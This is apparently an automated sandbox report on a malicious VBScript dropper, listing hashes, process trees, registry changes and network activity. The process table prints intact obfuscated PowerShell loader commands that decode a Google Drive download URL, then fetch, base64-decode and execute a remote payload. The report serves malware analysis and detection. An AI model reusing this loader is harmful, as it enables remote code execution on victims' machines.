| File name: | 26b82fd5a4ab4248f5a29df2d5b66b8bb09f92b5fdc74321524907a97964eea3.vbs |
| Full analysis: | https://app.any.run/tasks/38121130-3741-435f-94aa-a95307a8ac29 |
| Verdict: | Malicious activity |
| Analysis date: | March 05, 2024, 13:33:38 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | FAADCAFCBA5638E2085AEF8D41116AA6 |
| SHA1: | AB5EF9D2CD821CE7E26E882F526FBEABCC3C3854 |
| SHA256: | 26B82FD5A4AB4248F5A29DF2D5B66B8BB09F92B5FDC74321524907A97964EEA3 |
| SSDEEP: | 384:sPYAX6N2qI8x8vv+IdIoJTSGlLUXZZ6nYec:OYA6gqIcQ3drgGlYpknC |
MALICIOUS
Uses sleep, probably for evasion detection (SCRIPT)
- wscript.exe (PID: 5192)
SUSPICIOUS
Runs shell command (SCRIPT)
- wscript.exe (PID: 5192)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 5192)
- powershell.exe (PID: 4192)
Starts CMD.EXE for commands execution
- powershell.exe (PID: 4192)
- wscript.exe (PID: 5192)
- powershell.exe (PID: 2912)
Evaluates numerical expressions in cmd (potential data obfuscation)
- powershell.exe (PID: 4192)
- powershell.exe (PID: 2912)
INFO
Checks proxy server information
- slui.exe (PID: 4452)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
141
Monitored processes
10
Malicious processes
1
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2912 | "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skiddoos=46137+39879;$Cammed108 = 'set /A 1^^0';$Haars204 = (cmd /c $Cammed108);Function Accendible ($Abashed){$Coking = 8;$Unilingual=$Abashed.Length-1;For($Tekstmnstrets=7; $Tekstmnstrets -lt $Unilingual; $Tekstmnstrets+=$Coking){$Wrimple=$Wrimple+$Abashed.Substring($Tekstmnstrets, $Haars204)};$Wrimple;}function Scabridity ($Statusers){. ($Wrimple01) ($Statusers);}$Wrimple02=Accendible 'Lastsp.TB.lerner PredecaDrontennLand.rusSubvitrfP.liomyeDeterg,r NybyggrDeterioiOverplanmedgrligDraperi ';$Afstivningstmmers=Accendible 'Lodest.hUndervitAnkomsttInformapCoinsurs Soleno: Nonemb/ Causa,/Becha.edComposir laneriUklarhevOpfindsewormsee.Defoamog oncopiounmanagoSkalmurgUnderprlFringeneDrogent. Civ.licOsma fioPladerdmProvacc/Us,adelu Evi,cecindlaan?HauncheeOpsplitxAnsttelpCuriaraoCentrumrDesorietVapouri=CephaladVitalisoHirenphwDoomfulnhovmodel AmyralounderstaAm.ralidUdstehi&AmbulatiQuinquadUheldss=kistebu1argumen8Caccago5RadiogrM Me,vir9UdgangsE SuppleCTeenage4Prepend1UltraugdBere.niwKlemati5Aksi maI HamperCTythenoj Flonel2evidensrWeibyeiAStrejkewAttestaBUns,ipwWbrowsicN Automa7 Proteil Coni.icCo serv0nonoxidOSekundapDisp.rg0 onhydr1 Tachar5Vandlb x Rusti iHa burg ';$Wrimple01=Accendible ' Vitelli Udvi teUnders,x Center ';$Wrimple00=Accendible 'Insolat$BolendegTrapezelGeopol,o gep dab.luglikaDefrayalOutgene: Opbl nPAntiteshBy.tateyTrassentSkintilokvaliteg Demog.rDemarkaaUndisteph pocrahStockkeiKruseducBristniaArrasenlLeotard8Seksual Aphot t=Comm.ns VladimiSAnkylomt catophaPjattesrKollek t Bestrb-TyndsliBSrbes aiTeknolotForhaansStatio Tdrikr,drSpej.gsaIn,eksenAsperatsSyntaksfInframaeOr cularForha,d Artsarm-RamoselSTil,ehroExtractuklaringrCo,terbcCumha.ieIrradia Autoens$ StumpnAFornj.lfCivilissStudstpt Stningibellbotv pediadnMang,doiNicotinnIblandegMicrodis.kinneltTrf.erumInfernamExpermeecoessenrVentrilsSynephr Lystbet-KdehandDSemiflue Trashys .ortsyt Disputiso.tenenViolaquaSvagestt FederaiDionaeaobukserencerebra Rvesk $drikkeaPTaipisuh u egoiyD.nkiost Ud.redo SchoolgNoncommrJunoes.a .llegap orevishIntuitii TematicPosteroasilicasldaftber2p dsend ';Scabridity (Accendible 'S.aldic$Digt rvgCeratiilgregariooverfaubDepraveaDevierilMillion:SinglesPGithasvhInspi,eySnudesttprocessoVi lategAngou.erCount,ra bettonp Ov.rsthDagsb fiMedianscFldeskuaSturochl Paleoe2Morfins=imbrang$AnchieteOctart,nBl,ckshvCardiot:PoormasaKoncernp,pkastep scattedBengeleaTrueblut Epis maVulned, ') ;Scabridity (Accendible 'AlternaIWawahpamC tenatpBldningo .enhusr aloyert,lectro-Vi,tresMPaliuruo BoligsdUntangeuYo.thhelUmoral.eHejsevr SalvadoB InjuriitopnotetS rangcsBffelldTbaldriar FortjnaTaareganPrograms EftermfWulderse hjs etrWr,teup ') ;$Phytographical2=$Phytographical2+'\Gldseftergivelses.Fel' ;Scabridity (Accendible ' Swe,ge$Fe,eratgdimou.sl ,ouchmo .ideribYourselaMirakgllSkattel:InterstPEjerforh Kont ry Genfort RegimeoOptimerg Nedjusru,ringea Delefipoverbulh,rankisinonemancAreologaFjeligelTarokko7Afregni=Colorab(EunuchiTA.lgsbee VestensBlomstetTrrelof-PatonceP Octalsash,mmiet inguahScotist Underli$BadekaaPTunkaemhRente,nyAbletnetPaafyldobaudsprgmaalek.rUnfruita ChromipPatinathPrancomi.arbonacLa,gfriaU derkul Trickl2S.derkn)Kvadrat ') ;while (-not $Phytographical7) {Scabridity (Accendible ' forvrnIforflytf M,krot absor,e( Misrgt$PondingPPalm.hahMorphoty Indsb t NaphthoCha.tergI dkaldrLynhurtakvatorip lvisshhBanallyiFrstehacRemodulaKunstnel errass8Writing.Tailor JMeaslyuoOblikkebFoothotSIrr,laptWaflibuaFollicutTorskede Septi, Strivi -Flou isebellwavqBetatro Sidelin$ImponerWPresaubrSocio ei UnrimemMegaherparistomlBuslomme Be.tin0f.rsker2telesko)Unamic, Overcl{bolvrksSCapitaltBrunhedaSubcalcrvelfo,bt Thetar-.nnebirSCrass,llExtracoeDigitaleHaltefapCentera .otcher1Syntese}GlyoxalePostpe.lRecyclasIsflagee Andend{Mea.ingSStemmentRelandsa McgeemrslngtestDani,at-stjfiltSlovstril LivsvaeKaldenae assyrep,rontoe Overreg1Opsigel;Af,edtnSDawsonicUmedg laTrus enbConcilirTra,ficiP,ofligdNonrepriRackapetFritidsyLoachov papirp$SokolsgWudforinrKilledcistamcafmm.rkskrp,ichtjelSall.deesnurr.t0 Rumens0Spartel} Clinke ');Scabridity (Accendible 'Fs ebnd$Rade,bagSylvit.lS,avophoFortrstbMutualiaPodophylNonanim:P,rdineP FamseshDisa reydrawar tTilregnoStikprvgHurtfulrEgotripaBaandskp kmpernhmountdai Bra glcPintetoa OliskelSma fil7Radiogr=Stilret(FrailsbTInautheeUnnumersOpinicut Duevej-HderkroP No fluaProffertUnse.erhMagneti Afprv,u$AntalgoPNonpershFas sttyo,brelltParabelo,ietarigPar digrUdvisniaUncontrpHjkirkehStvkonsiFinanslcBedstema Vandbel C,amle2Fladere)Hetaeri ') ;}Scabridity (Accendible 'B evbak$Bankerdg Ordinal Uti igoMarsupibopalesca Br.ndflUnworsh:SnekkehLGenerena SandkreDisraeloRevivi tBlindetrKalasetoI,kassepPerloneoCadaveruDyr,kuestoemexc Diktato=Snowshi ChouxtGCleistoeIssac.atC.fetea-Bilk.saCpantotao QuizzanF,ingeetInspirae Haspnin M.otomt elvbet Centuma$ComplexPTotalithAfsoegnyStamment Indv no P,econgKontaktr Bjr.ena,panierp RadiathAmarilliUnilluscRubedinaFlottenlvalguse2Taksato ');Scabridity (Accendible ' Favell$Overcarg C,uciflDetickeoGo.vinsbRuggednakhariaslMeshugg:.ladelaL M.getpa Gangarm Hjemmeepopuloul Vognt,lOrisonsiUrosignrMurengeoNonepi sDominiktTiltroerGenoptra SmaabolMiscues Uphurlu=Bebrush Dishono[SygemelSRemittoyN enkebsLynchnit .tartieShagamamForlods.Cent.icCRam sjao raillenCollabovTsunam,eExemp.ir etranstI telli]Nonappe: Antibl: undepFDeene,gr PlastvoCra,iovmS.rrogaBHalvpenaSknhedesLengt eeOverdro6ribbidg4ProklamSTimelnnt Gormanr.tevieli Moderan.fesschg.enskab(His,ori$sto,enwLMentat,aBoar,ine.ddanneoNoctilutMycoticrGephyrooKop.lerpDeskri.oMilita,uS,udieasEccen,r)Acciden ');Scabridity (Accendible 'Ramadan$ParchekgRegu.erlKla sisoKageforb FjerboaTotalitlHe,eaar:MonstrsW egattrSetternilurifakm OrdmelpSalmesalElskende preden2I korpo Triquin=Stemnin Haandkr[RedosopSrundvisyP,tchrasExcursitRunl tseSkad.sfmConstr..BenchlaT Fir.ngeNonfricxLa dstttAfsgn.n.Skridf.EOutragin entiacDiffereoS ddelmd D lplai I.speknForndnegFaenome].ejldug:Pleuros:AfdelinAOmlsninS o isthCAcontiuIDetribaIBerappe.SublacuGFa,vetreStivetrtFlatterSswagsmetUntrendrExcelleiTartelenEgyptiagFormand(Teorish$ KunstaLBazookaaRidsedem.inickie PillorlBortfralSlentreiCog.atir MonsteoKnoldessgrimesctviscomerSat ritaEphaoptl Plau.i)Paaka.d ');Scabridity (Accendible 'Bernha,$ uinticgSpurgtelLamaiteoBe.oligbFacetssaTogternl Exquis:ProcrypWTrommesr SuburbiFoamstimOverskup.roclasl Bunk eeOrangou3Geronto= Chetkb$ Hakk,oWBrancher,refertiFoison.mErhvervp Sequeslnavifo,eYasmina2Drap,av.LunulaesFradmm.u Udgjo.bHanoidasSkehejrtEtam nerK.nziteivableskn .ndersgU,nytte(Ligning3Iscario2Twittyr1Par.iro3Vikliso8Magnetp4Bukke d,Skriged3Bommert1,andels8Subadmi2Quinque2Enteroc)Non cco ');Scabridity $Wrimple3;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3056 | "C:\WINDOWS\system32\cmd.exe" /c "set /A 1^^0" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3264 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4192 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skiddoos=46137+39879;$Cammed108 = 'set /A 1^^0';$Haars204 = (cmd /c $Cammed108);Function Accendible ($Abashed){$Coking = 8;$Unilingual=$Abashed.Length-1;For($Tekstmnstrets=7; $Tekstmnstrets -lt $Unilingual; $Tekstmnstrets+=$Coking){$Wrimple=$Wrimple+$Abashed.Substring($Tekstmnstrets, $Haars204)};$Wrimple;}function Scabridity ($Statusers){. ($Wrimple01) ($Statusers);}$Wrimple02=Accendible 'Lastsp.TB.lerner PredecaDrontennLand.rusSubvitrfP.liomyeDeterg,r NybyggrDeterioiOverplanmedgrligDraperi ';$Afstivningstmmers=Accendible 'Lodest.hUndervitAnkomsttInformapCoinsurs Soleno: Nonemb/ Causa,/Becha.edComposir laneriUklarhevOpfindsewormsee.Defoamog oncopiounmanagoSkalmurgUnderprlFringeneDrogent. Civ.licOsma fioPladerdmProvacc/Us,adelu Evi,cecindlaan?HauncheeOpsplitxAnsttelpCuriaraoCentrumrDesorietVapouri=CephaladVitalisoHirenphwDoomfulnhovmodel AmyralounderstaAm.ralidUdstehi&AmbulatiQuinquadUheldss=kistebu1argumen8Caccago5RadiogrM Me,vir9UdgangsE SuppleCTeenage4Prepend1UltraugdBere.niwKlemati5Aksi maI HamperCTythenoj Flonel2evidensrWeibyeiAStrejkewAttestaBUns,ipwWbrowsicN Automa7 Proteil Coni.icCo serv0nonoxidOSekundapDisp.rg0 onhydr1 Tachar5Vandlb x Rusti iHa burg ';$Wrimple01=Accendible ' Vitelli Udvi teUnders,x Center ';$Wrimple00=Accendible 'Insolat$BolendegTrapezelGeopol,o gep dab.luglikaDefrayalOutgene: Opbl nPAntiteshBy.tateyTrassentSkintilokvaliteg Demog.rDemarkaaUndisteph pocrahStockkeiKruseducBristniaArrasenlLeotard8Seksual Aphot t=Comm.ns VladimiSAnkylomt catophaPjattesrKollek t Bestrb-TyndsliBSrbes aiTeknolotForhaansStatio Tdrikr,drSpej.gsaIn,eksenAsperatsSyntaksfInframaeOr cularForha,d Artsarm-RamoselSTil,ehroExtractuklaringrCo,terbcCumha.ieIrradia Autoens$ StumpnAFornj.lfCivilissStudstpt Stningibellbotv pediadnMang,doiNicotinnIblandegMicrodis.kinneltTrf.erumInfernamExpermeecoessenrVentrilsSynephr Lystbet-KdehandDSemiflue Trashys .ortsyt Disputiso.tenenViolaquaSvagestt FederaiDionaeaobukserencerebra Rvesk $drikkeaPTaipisuh u egoiyD.nkiost Ud.redo SchoolgNoncommrJunoes.a .llegap orevishIntuitii TematicPosteroasilicasldaftber2p dsend ';Scabridity (Accendible 'S.aldic$Digt rvgCeratiilgregariooverfaubDepraveaDevierilMillion:SinglesPGithasvhInspi,eySnudesttprocessoVi lategAngou.erCount,ra bettonp Ov.rsthDagsb fiMedianscFldeskuaSturochl Paleoe2Morfins=imbrang$AnchieteOctart,nBl,ckshvCardiot:PoormasaKoncernp,pkastep scattedBengeleaTrueblut Epis maVulned, ') ;Scabridity (Accendible 'AlternaIWawahpamC tenatpBldningo .enhusr aloyert,lectro-Vi,tresMPaliuruo BoligsdUntangeuYo.thhelUmoral.eHejsevr SalvadoB InjuriitopnotetS rangcsBffelldTbaldriar FortjnaTaareganPrograms EftermfWulderse hjs etrWr,teup ') ;$Phytographical2=$Phytographical2+'\Gldseftergivelses.Fel' ;Scabridity (Accendible ' Swe,ge$Fe,eratgdimou.sl ,ouchmo .ideribYourselaMirakgllSkattel:InterstPEjerforh Kont ry Genfort RegimeoOptimerg Nedjusru,ringea Delefipoverbulh,rankisinonemancAreologaFjeligelTarokko7Afregni=Colorab(EunuchiTA.lgsbee VestensBlomstetTrrelof-PatonceP Octalsash,mmiet inguahScotist Underli$BadekaaPTunkaemhRente,nyAbletnetPaafyldobaudsprgmaalek.rUnfruita ChromipPatinathPrancomi.arbonacLa,gfriaU derkul Trickl2S.derkn)Kvadrat ') ;while (-not $Phytographical7) {Scabridity (Accendible ' forvrnIforflytf M,krot absor,e( Misrgt$PondingPPalm.hahMorphoty Indsb t NaphthoCha.tergI dkaldrLynhurtakvatorip lvisshhBanallyiFrstehacRemodulaKunstnel errass8Writing.Tailor JMeaslyuoOblikkebFoothotSIrr,laptWaflibuaFollicutTorskede Septi, Strivi -Flou isebellwavqBetatro Sidelin$ImponerWPresaubrSocio ei UnrimemMegaherparistomlBuslomme Be.tin0f.rsker2telesko)Unamic, Overcl{bolvrksSCapitaltBrunhedaSubcalcrvelfo,bt Thetar-.nnebirSCrass,llExtracoeDigitaleHaltefapCentera .otcher1Syntese}GlyoxalePostpe.lRecyclasIsflagee Andend{Mea.ingSStemmentRelandsa McgeemrslngtestDani,at-stjfiltSlovstril LivsvaeKaldenae assyrep,rontoe Overreg1Opsigel;Af,edtnSDawsonicUmedg laTrus enbConcilirTra,ficiP,ofligdNonrepriRackapetFritidsyLoachov papirp$SokolsgWudforinrKilledcistamcafmm.rkskrp,ichtjelSall.deesnurr.t0 Rumens0Spartel} Clinke ');Scabridity (Accendible 'Fs ebnd$Rade,bagSylvit.lS,avophoFortrstbMutualiaPodophylNonanim:P,rdineP FamseshDisa reydrawar tTilregnoStikprvgHurtfulrEgotripaBaandskp kmpernhmountdai Bra glcPintetoa OliskelSma fil7Radiogr=Stilret(FrailsbTInautheeUnnumersOpinicut Duevej-HderkroP No fluaProffertUnse.erhMagneti Afprv,u$AntalgoPNonpershFas sttyo,brelltParabelo,ietarigPar digrUdvisniaUncontrpHjkirkehStvkonsiFinanslcBedstema Vandbel C,amle2Fladere)Hetaeri ') ;}Scabridity (Accendible 'B evbak$Bankerdg Ordinal Uti igoMarsupibopalesca Br.ndflUnworsh:SnekkehLGenerena SandkreDisraeloRevivi tBlindetrKalasetoI,kassepPerloneoCadaveruDyr,kuestoemexc Diktato=Snowshi ChouxtGCleistoeIssac.atC.fetea-Bilk.saCpantotao QuizzanF,ingeetInspirae Haspnin M.otomt elvbet Centuma$ComplexPTotalithAfsoegnyStamment Indv no P,econgKontaktr Bjr.ena,panierp RadiathAmarilliUnilluscRubedinaFlottenlvalguse2Taksato ');Scabridity (Accendible ' Favell$Overcarg C,uciflDetickeoGo.vinsbRuggednakhariaslMeshugg:.ladelaL M.getpa Gangarm Hjemmeepopuloul Vognt,lOrisonsiUrosignrMurengeoNonepi sDominiktTiltroerGenoptra SmaabolMiscues Uphurlu=Bebrush Dishono[SygemelSRemittoyN enkebsLynchnit .tartieShagamamForlods.Cent.icCRam sjao raillenCollabovTsunam,eExemp.ir etranstI telli]Nonappe: Antibl: undepFDeene,gr PlastvoCra,iovmS.rrogaBHalvpenaSknhedesLengt eeOverdro6ribbidg4ProklamSTimelnnt Gormanr.tevieli Moderan.fesschg.enskab(His,ori$sto,enwLMentat,aBoar,ine.ddanneoNoctilutMycoticrGephyrooKop.lerpDeskri.oMilita,uS,udieasEccen,r)Acciden ');Scabridity (Accendible 'Ramadan$ParchekgRegu.erlKla sisoKageforb FjerboaTotalitlHe,eaar:MonstrsW egattrSetternilurifakm OrdmelpSalmesalElskende preden2I korpo Triquin=Stemnin Haandkr[RedosopSrundvisyP,tchrasExcursitRunl tseSkad.sfmConstr..BenchlaT Fir.ngeNonfricxLa dstttAfsgn.n.Skridf.EOutragin entiacDiffereoS ddelmd D lplai I.speknForndnegFaenome].ejldug:Pleuros:AfdelinAOmlsninS o isthCAcontiuIDetribaIBerappe.SublacuGFa,vetreStivetrtFlatterSswagsmetUntrendrExcelleiTartelenEgyptiagFormand(Teorish$ KunstaLBazookaaRidsedem.inickie PillorlBortfralSlentreiCog.atir MonsteoKnoldessgrimesctviscomerSat ritaEphaoptl Plau.i)Paaka.d ');Scabridity (Accendible 'Bernha,$ uinticgSpurgtelLamaiteoBe.oligbFacetssaTogternl Exquis:ProcrypWTrommesr SuburbiFoamstimOverskup.roclasl Bunk eeOrangou3Geronto= Chetkb$ Hakk,oWBrancher,refertiFoison.mErhvervp Sequeslnavifo,eYasmina2Drap,av.LunulaesFradmm.u Udgjo.bHanoidasSkehejrtEtam nerK.nziteivableskn .ndersgU,nytte(Ligning3Iscario2Twittyr1Par.iro3Vikliso8Magnetp4Bukke d,Skriged3Bommert1,andels8Subadmi2Quinque2Enteroc)Non cco ');Scabridity $Wrimple3;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4452 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5192 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\26b82fd5a4ab4248f5a29df2d5b66b8bb09f92b5fdc74321524907a97964eea3.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 5660 | ping 6777.6777.6777.677e | C:\Windows\System32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6056 | cmd.exe /c ping 6777.6777.6777.677e | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6304 | "C:\WINDOWS\system32\cmd.exe" /c "set /A 1^^0" | C:\Windows\SysWOW64\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.746 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6520 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
15 216
Read events
15 192
Write events
24
Delete events
0
Modification events
| (PID) Process: | (5192) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (5192) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (5192) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (5192) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (4192) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (4192) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (4192) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (4192) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (2912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2912) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
Executable files
0
Suspicious files
0
Text files
4
Unknown types
1
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4192 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a1wv3hhd.owt.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bzlrx34g.35c.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rpo2tu4v.lkf.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4192 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_invzhw40.5jd.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2912 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:C76555487F3760099709FD7487BFB259 | SHA256:AD8BEE1720C0631AAD060FC8CDC56D9B6AB83541731C816EA3D0AA2D073CE861 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
33
DNS requests
16
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
6440 | svchost.exe | GET | 200 | 2.18.79.138:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | binary | 1.01 Kb | unknown |
5928 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
1776 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | unknown | binary | 471 b | unknown |
1248 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | binary | 314 b | unknown |
2464 | svchost.exe | GET | 200 | 23.35.209.170:80 | http://x1.c.lencr.org/ | unknown | binary | 717 b | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
6440 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3848 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5184 | SearchApp.exe | 95.100.98.104:443 | www.bing.com | Akamai International B.V. | IE | unknown |
5928 | svchost.exe | 40.126.32.133:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
6896 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5928 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
6440 | svchost.exe | 2.18.79.138:80 | crl.microsoft.com | Akamai International B.V. | AT | unknown |
5928 | svchost.exe | 40.126.32.74:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1248 | backgroundTaskHost.exe | 95.100.98.104:443 | www.bing.com | Akamai International B.V. | IE | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
6777.6777.6777.677e |
| unknown |
ocsp.digicert.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
arc.msn.com |
| whitelisted |
drive.google.com |
| shared |
drive.usercontent.google.com |
| unknown |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |